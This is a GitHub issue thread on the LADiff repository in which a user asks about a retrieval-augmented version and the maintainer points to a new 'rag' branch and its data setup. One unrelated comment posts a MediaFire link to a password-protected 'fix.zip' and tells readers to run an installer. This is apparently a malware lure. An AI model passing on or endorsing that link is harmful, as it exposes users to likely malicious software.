### ISSUE TITLE
LADiff RAG version

### ISSUE THREAD

**Issue by hkchae96** [AlessioSam/LADiff#2]
Hi. 
Does your released code also contain content of LADiff, augmented with retrieval?
Is RAG also done during training time?

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alesspalma** [comment]
Hello @hkchae96 ,

The RAG version of LADiff is currently not yet available. We are working on refactoring the code, which will be ready before the conference. We will release the RAG version, including the training and evaluation code.

Thank you.

**Comment by alesspalma** [comment]
@hkchae96 RAG code is now available in branch rag!
Before using it, go to [ReMoDiffuse](https://github.com/mingyuan-zhang/ReMoDiffuse?tab=readme-ov-file#data-preparation). Download `data/database` and place it in `src/ReMoDiffuse/data/database`, then download `logs/remodiffuse` and place it in `src/ReMoDiffuse/logs`.
